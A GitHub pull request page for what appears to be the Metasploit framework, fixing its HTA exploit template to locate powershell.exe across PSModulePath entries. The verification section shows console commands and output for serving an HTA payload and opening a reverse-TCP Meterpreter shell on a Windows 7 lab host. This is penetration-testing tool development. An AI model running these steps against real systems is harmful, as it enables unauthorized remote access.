Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Handle multiple entries in PSModulePath #8267

Merged
merged 1 commit into from
Aug 20, 2017
Merged

Handle multiple entries in PSModulePath #8267

merged 1 commit into from
Aug 20, 2017

Conversation

kaospunk
Copy link
Contributor

@kaospunk kaospunk commented Apr 19, 2017
edited by busterb

This commit handles the case where more than one entry exists in
the PSModulePath environment variable. The updated code will loop
through each entry in the PSModulePath checking for the presence of
powershell.exe. When one is encountered it will execute the payload
and exit the for loop.

Verification

  • Start msfconsole
  • use exploit/windows/misc/hta_server and verify you can get a session
msf exploit(handler) > use exploit/windows/misc/hta_server
msf exploit(hta_server) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.18.230:4444 
msf exploit(hta_server) > [*] Using URL: http://0.0.0.0:80/HHlDRyhjXjoD.hta
[*] Local IP: http://192.168.18.230:80/HHlDRyhjXjoD.hta
[*] Server started.
[*] 192.168.18.55     hta_server - Delivering Payload
[*] 192.168.18.55     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.18.55
[*] Meterpreter session 1 opened (192.168.18.230:4444 -> 192.168.18.55:50668) at 2017-04-19 11:53:32 -0400

msf exploit(hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN-YPKLGCPOGE7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

@kaospunk
Handle multiple entries in PSModulePath
c724f0e 
This commit handles the case where more than one entry exists in
the PSModulePath environment variable. The updated code will loop
through each entry in the PSModulePath checking for the presence of
powershell.exe. When one is encountered it will execute the payload
and exit the for loop.
@kaospunk kaospunk mentioned this pull request Apr 26, 2017
Merged
@busterb busterb assigned busterb and wchen-r7 and unassigned busterb Apr 26, 2017
@bwatters-r7
Copy link
Contributor

Note similar PR: #8299

@busterb busterb merged commit c724f0e into rapid7:master Aug 20, 2017
busterb pushed a commit that referenced this pull request Aug 20, 2017
Land #8267, Handle multiple entries in PSModulePath
e734a79
@busterb busterb self-assigned this Aug 20, 2017
@busterb
Copy link
Member

busterb commented Aug 20, 2017
edited by tdoan-r7

Release Notes

This fix updates the HTA file format exploit template to handle the case where more than one entry exists in the PSModulePath environment variable. The updated code will loop through each entry in the PSModulePath checking for the presence of powershell.exe. When one is encountered, it will execute the payload and exit the for loop.

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 30, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

@busterb busterb

Labels
bug library rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@kaospunk @bwatters-r7 @busterb @wchen-r7 @tdoan-r7